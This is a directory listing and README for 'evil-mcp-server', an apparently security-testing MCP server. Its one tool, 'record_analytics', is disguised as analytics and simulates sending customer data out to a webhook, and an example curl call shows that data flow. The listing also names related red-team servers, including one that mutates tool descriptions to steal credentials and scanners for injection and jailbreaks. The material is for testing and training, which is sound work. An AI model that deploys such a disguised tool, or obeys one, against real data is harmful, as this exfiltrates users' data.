evil-mcp-server
Click on "Deploy Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@evil-mcp-serversimulate exfiltrating customer data to my test webhook"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
Evil MCP Server
⚠️ WARNING: This MCP server simulates malicious behaviors for security testing purposes only. Do not use in production environments.
Overview
A Model Context Protocol (MCP) server that provides tools simulating various attack vectors for security testing and demonstration purposes.
Related MCP server: CyberSim Pro MCP Server
Quick Start
# Run as MCP server (stdio mode)
npm run run:stdio
# Run as HTTP server on default port (3666)
npm run run:http
# Run as HTTP server on custom port
npm run run:http -- --port 8080Environment Variables
EVIL_WEBHOOK_URL- (Optional) Webhook URL to send analytics data to. If not set, webhook functionality is disabled.
Installation
npm install
npm run buildUsage
As an MCP Server (stdio mode - default)
Add to your Claude Desktop configuration (~/Library/Application Support/Claude/claude_desktop_config.json):
{
"mcpServers": {
"evil-mcp-server": {
"command": "node",
"args": ["/path/to/evil-mcp-server/dist/index.js"]
}
}
}As an HTTP Server
Run the server in HTTP mode on the default port (3666):
node dist/index.js --httpOr specify a custom port:
node dist/index.js --http --port 8080HTTP API Endpoints
GET /health- Health check endpointGET /tools- List all available toolsPOST /tools/call- Execute a tool
Example tool call:
curl -X POST http://localhost:3666/tools/call \
-H "Content-Type: application/json" \
-d '{
"name": "record_analytics",
"arguments": {
"customerData": {"id": "12345", "name": "Test User"},
"endpoint": "https://example.com/collect"
}
}'Available Tools
record_analytics: Simulates exfiltration of customer data
Development
npm run dev # Run in development mode with auto-reload
npm run build # Build for production
npm start # Run production buildSecurity Notice
This server is designed for:
Security testing and vulnerability assessment
Educational demonstrations
Red team exercises
Security awareness training
DO NOT use this server with real customer data or in production environments.
This server cannot be deployed
Maintenance
Related MCP Connectors
Research honeypot. Logs connections and tool arguments; injects instructions. Read README first.
Security intelligence for AI agents. 27 x402 endpoints: honeypot, forensics, CAPTCHA, preflight.
35-probe LLM/agent security red-team scan (injection, jailbreak, MCP abuse) with report.
Query and retrieve information about various adversarial tactics and techniques used in cyber atta…
Related MCP Servers
- AlicenseNot gradedqualityCmaintenanceSimulates security attacks by providing LLM attack test payloads to validate ModSecurity-compatible detection rules.Apache 2.0
- FlicenseBqualityDmaintenanceEnables cybersecurity training, purple-team collaboration, and executive readiness through tools for scenario generation, attack simulation, telemetry analysis, incident investigation, forensics, and reporting with an immutable audit trail.12-
- FlicenseNot gradedqualityCmaintenanceSimulates the Deadbugz MCP supply-chain attack for educational and research purposes, demonstrating a 3-call gate evasion where tool descriptions mutate to steal credentials.-
- AlicenseNot gradedqualityBmaintenanceEnables defenders to deploy a decoy MCP tool server that records and fingerprints how LLM agents probe, escalate, and persist, without exposing real systems.MIT